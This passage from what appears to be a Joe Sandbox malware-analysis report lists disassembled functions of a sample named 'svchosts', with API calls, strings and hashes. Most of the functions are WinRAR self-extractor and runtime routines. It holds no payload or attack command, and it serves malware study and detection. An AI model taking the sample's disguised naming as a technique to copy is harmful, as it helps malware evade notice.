Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e15b0ea1030b5aa221e017558168141ef39eeb31f68285abd52187dc9f03d664
Instruction ID: fe6e290d28af7d42d7ca8504a307158bd048d467d87828084cdb089aa63ffafc
Opcode Fuzzy Hash: e15b0ea1030b5aa221e017558168141ef39eeb31f68285abd52187dc9f03d664
Instruction Fuzzy Hash: C011747652010DAFCB11EF54CA42CDA3BB9FF04390B5141A5BA0C8B666EA31EE61DF80

Function 00292162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 0029267A
;%u, xrefs: 00292497
xc%u, xrefs: 002926D7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 05cc1466c54157d7aecedb9f50697f8cc4af8f91cc49af18afa05f445cc776d5
Instruction ID: ec91a32a93f2534ccc007342b21f60517e96e83a8130bcc96d14496f9c64f5b8
Opcode Fuzzy Hash: 05cc1466c54157d7aecedb9f50697f8cc4af8f91cc49af18afa05f445cc776d5
Instruction Fuzzy Hash: 17F13671624241ABDF15EF748895BEE7799AFD0300F080579FC85DB283DA64D86CCBA2

Function 002AACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

EndDialog.USER32(?,00000001), ref: 002AAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 002AAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002AAD60
SetWindowTextW.USER32(?,?), ref: 002AAD71
GetDlgItem.USER32(?,00000065), ref: 002AAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002AAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002AADA4

Strings

LICENSEDLG, xrefs: 002AACE4

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 23b7c5f33df3a672b09f62e949a0092caeb25a88926c0fd4eff9ae2e33018abd
Instruction ID: 74c13338052d002ba77d6c7dcfa64fc4b1b3c8f7a0c4e7570a8cadc19b479466
Opcode Fuzzy Hash: 23b7c5f33df3a672b09f62e949a0092caeb25a88926c0fd4eff9ae2e33018abd
Instruction Fuzzy Hash: E721D632660205BBD6215F25FC4DF3B3B6CEF5BB96F010019F244A64A0DF525924DA32

Function 00299443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00299448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0029946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0029948A

Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2

_swprintf.LIBCMT ref: 00299526

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

MoveFileW.KERNEL32(?,?), ref: 00299595
MoveFileW.KERNEL32(?,?), ref: 002995D5

Strings

rtmp%d, xrefs: 0029950F

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 493e353385be4683f83f266a08f8f9baa3cbbf7f3d1e83c232697fb4ebcbdf90
Instruction ID: 6afe7f41dbc19d29db9a0e72645f37ec52e2102301aab5db748e79feb3d33e1d
Opcode Fuzzy Hash: 493e353385be4683f83f266a08f8f9baa3cbbf7f3d1e83c232697fb4ebcbdf90
Instruction Fuzzy Hash: F8415F7292025966CF20EF699C85EEA737CAF15390F0044E9B549E3042EB749BE9CF60

Function 002B8FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
_free.LIBCMT ref: 002B8FDC
_free.LIBCMT ref: 002B9004
SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B9011
SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
_abort.LIBCMT ref: 002B9023

Strings

X,, xrefs: 002B8FF7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: X,
API String ID: 3160817290-3991676738
Opcode ID: 4a4f94b502e18cb0510a7bf37353a456585f094dc62939474d5fcbe0b4bdc9eb
Instruction ID: 786f4093e588c993b87ad99f472f19fecddd6ff260a487d026a5be3df4b3a15e
Opcode Fuzzy Hash: 4a4f94b502e18cb0510a7bf37353a456585f094dc62939474d5fcbe0b4bdc9eb
Instruction Fuzzy Hash: 9AF02832534612AACA2177247C0EFFB2A2E9BC17E0B350414F61CD2592EF30CDB1DA50

Function 002A0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 002A0A9D

Part of subcall function 0029ACF5: GetVersionExW.KERNEL32(?), ref: 0029AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 002A0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 002A0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002A0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 002A0B3D
__aullrem.LIBCMT ref: 002A0BCB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: c0194a7af29a49a7355c68d7ae4a6498b129045ac80bab3630d448ff16b7d400
Instruction ID: cfaab94ca40bd6a54b3e1adbcd2739cc19749f6b690dd4138cf3c007df895b8d
Opcode Fuzzy Hash: c0194a7af29a49a7355c68d7ae4a6498b129045ac80bab3630d448ff16b7d400
Instruction Fuzzy Hash: CB4149B24083069FC710DF65C88496BF7F8FB88718F004E2EF59692650EB75E559CB62

Function 002BEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002BF5A2,?,00000000,?,00000000,00000000), ref: 002BEE6F
__fassign.LIBCMT ref: 002BEEEA
__fassign.LIBCMT ref: 002BEF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002BEF2B
WriteFile.KERNEL32(?,?,00000000,002BF5A2,00000000,?,?,?,?,?,?,?,?,?,002BF5A2,?), ref: 002BEF4A
WriteFile.KERNEL32(?,?,00000001,002BF5A2,00000000,?,?,?,?,?,?,?,?,?,002BF5A2,?), ref: 002BEF83

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 881ad80b839778c48fc4b6975747532a4fb25ccbe6b43f0325975e739f57b4ec
Instruction ID: 05309500579073c00900ea8fab58796fba90c7a8bfa0c5c455dd484dde236eea
Opcode Fuzzy Hash: 881ad80b839778c48fc4b6975747532a4fb25ccbe6b43f0325975e739f57b4ec
Instruction Fuzzy Hash: 1E51D371A102099FDF10CFA8DC85AFEBBF9EF08350F25451AE955E7291E770A950CB60

Function 002AC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 002AC54A
_swprintf.LIBCMT ref: 002AC57E

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

SetDlgItemTextW.USER32(?,00000066,002D946A), ref: 002AC59E
_wcschr.LIBVCRUNTIME ref: 002AC5D1
EndDialog.USER32(?,00000001), ref: 002AC6B2

Strings

%s%s%u, xrefs: 002AC573

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 1e5527a70771183ce4b08cf621b61d9fbd4ca6f823a77cbe40462eb31d68da5e
Instruction ID: e81cab9dbbe03b1f9584d9edf78df7e6c83020e0adf95795500ace9c4ca730c3
Opcode Fuzzy Hash: 1e5527a70771183ce4b08cf621b61d9fbd4ca6f823a77cbe40462eb31d68da5e
Instruction Fuzzy Hash: 3E41DF71D20618ABDF22DFA0DC48EEA77BCEB09705F1040A6F509E6061EB719AE4CF50

Function 002A8E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 002A8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002A8F59

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 002A8EB2
utf-8"></head>, xrefs: 002A8EBD
</html>, xrefs: 002A8F0A
<html>, xrefs: 002A8EA7, 002A8EE0

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 3aabdd2a4d103ef8a873e48495b9fe178c72c84f5024b8a5f49752a7bb4026e1
Instruction ID: 2a5f0177d7acc2d205f677d7afddb30235e85376b7fd8799c27fad8241683d45
Opcode Fuzzy Hash: 3aabdd2a4d103ef8a873e48495b9fe178c72c84f5024b8a5f49752a7bb4026e1
Instruction Fuzzy Hash: 59312831528312AFD724BF349C06FABBB68DF937A0F54051DF801A61D1EF749A2987A1

Function 002A9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 002A964E
GetWindowRect.USER32(?,00000000), ref: 002A9693
ShowWindow.USER32(?,00000005,00000000), ref: 002A972A
SetWindowTextW.USER32(?,00000000), ref: 002A9732
ShowWindow.USER32(00000000,00000005), ref: 002A9748

Strings

RarHtmlClassName, xrefs: 002A96F4

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: f161fab20b7e40d03d230371b75dcedd3fb2c83fa00f3e0736896a00c926882b
Instruction ID: 2c4ea2e03b78c1bf5e0cd970826a8f130d877fb88157665efb3e1e192e000ea4
Opcode Fuzzy Hash: f161fab20b7e40d03d230371b75dcedd3fb2c83fa00f3e0736896a00c926882b
Instruction Fuzzy Hash: 7431CE71014210EFCB219F65ED4CB6BBBACEF4A751F004569FA49AA152CB30D8A8CF65

Function 002BBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002BBF79: _free.LIBCMT ref: 002BBFA2

_free.LIBCMT ref: 002BC003

Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506

_free.LIBCMT ref: 002BC00E
_free.LIBCMT ref: 002BC019
_free.LIBCMT ref: 002BC06D
_free.LIBCMT ref: 002BC078
_free.LIBCMT ref: 002BC083
_free.LIBCMT ref: 002BC08E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 345456ba6a70d627814c9bcb2e8070f6af182bb43d0e65c88b907f5c5c536371
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: B9112C71560B08FAD621BBB1CD06FDBB7ADAF00780F408815B29D66C52DBA5F9248F90

Function 002B20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,002B20C1,002AFB12), ref: 002B20D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B20E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B20FF
SetLastError.KERNEL32(00000000,?,002B20C1,002AFB12), ref: 002B2151

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 01e893124081c34650ae2458a5fa59410fe238ccb671ed52f67424c83b8fe504
Instruction ID: 058a18e5e2293602e88808ec2c9d1ae9f00524a4615ed33949d70717a86702b6
Opcode Fuzzy Hash: 01e893124081c34650ae2458a5fa59410fe238ccb671ed52f67424c83b8fe504
Instruction Fuzzy Hash: 0F01F032139312AEBB746F797C499D7278CEF117F07310629F228550E2EF514C259B44

Function 002B9029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,002B895F,002B85FB,?,002B8FD3,00000001,00000364,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B902E
_free.LIBCMT ref: 002B9063
_free.LIBCMT ref: 002B908A
SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B9097
SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B90A0

Strings

X,, xrefs: 002B907E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorLast$_free
String ID: X,
API String ID: 3170660625-3991676738
Opcode ID: 576356d9e581a91974be02d5cf74a6a67fee65b8107b8ac708c5de1917860267
Instruction ID: 293453ec3fe8358d5ca4763f631d442d0e7973a681435a722e84273ebfb1f1da
Opcode Fuzzy Hash: 576356d9e581a91974be02d5cf74a6a67fee65b8107b8ac708c5de1917860267
Instruction Fuzzy Hash: 17014472534A026B87327B787C89DEB2A2D9BD17F13310824FB1992252EF70CCB18560

Function 002ADC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

ReleaseSRWLockExclusive, xrefs: 002ADCD9
AcquireSRWLockExclusive, xrefs: 002ADCC9
KERNEL32.DLL, xrefs: 002ADCB4

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 744487a8833b243bcac65d1f823048251285e92ba5c3c7df49422f06a798ef56
Instruction ID: 33a3ec64acef3c51084aa1b9f7722351ffaedd58adfcdb73135f6322e78963a9
Opcode Fuzzy Hash: 744487a8833b243bcac65d1f823048251285e92ba5c3c7df49422f06a798ef56
Instruction Fuzzy Hash: 4A01A9726726235B4F305E746CC9AA61395AE47373360463FE513D3610DE91C8A5D6A0

Function 002B8060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B807E

Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506

_free.LIBCMT ref: 002B8090
_free.LIBCMT ref: 002B80A3
_free.LIBCMT ref: 002B80B4
_free.LIBCMT ref: 002B80C5

Strings

,, xrefs: 002B8074

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: ,
API String ID: 776569668-609127500
Opcode ID: 8649e7ae8c72376be1dadb532c71f9b4c873b63946d7539bfafc0875a94f0011
Instruction ID: 514386ed8f702aeaa1b40a535eab829afb3b27ef76eb9cebfd08767b6b760e08
Opcode Fuzzy Hash: 8649e7ae8c72376be1dadb532c71f9b4c873b63946d7539bfafc0875a94f0011
Instruction Fuzzy Hash: 7DF03A74821125CB8B116F1ABD098A53B6DBB147F0349462AF80AD7A70DB310872DFC1

Function 002A0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0D0D

Part of subcall function 0029ACF5: GetVersionExW.KERNEL32(?), ref: 0029AD1A

LocalFileTimeToFileTime.KERNEL32(?,002A0CB8), ref: 002A0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 002A0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002A0D56
SystemTimeToFileTime.KERNEL32(?,002A0CB8), ref: 002A0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0D72

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
